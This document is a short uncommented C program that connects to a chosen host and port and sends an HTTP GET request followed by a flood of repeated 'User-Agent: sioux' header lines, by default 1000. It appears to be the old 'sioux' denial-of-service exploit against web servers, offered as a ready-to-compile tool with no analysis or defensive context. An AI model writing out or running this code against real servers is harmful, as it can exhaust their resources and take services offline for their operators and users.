#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void
usage(void) {
  exit(1);
}
int
main(int argc, char *argv[]) {
  struct sockaddr_in sin;
  struct hostent *he;
  FILE *f;
  int o, sd;
  char *addr = "localhost";
  int port = 80;
  int num = 1000;
  while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
    switch (o) {
      case 'a':
       addr = optarg;
       break;
      case 'p':
       port = atoi(optarg);
       break;
      case 'n':
       num = atoi(optarg);
       break;
      default:
       usage();
    }
    if ((he = gethostbyname(addr)) == NULL) {
      exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);
    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        exit(1);
    }
    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        exit(1);
    }
    if ((f = fdopen(sd, "r+")) == NULL) {
        exit(1);
    }
    fprintf(f, "GET / HTTP/1.1\r\n");
    while (num-- && !ferror(f))
      fprintf(f, "User-Agent: sioux\r\n");
    if (ferror(f)) {
      exit(1);
    }
    fclose(f);
    exit(0);
}
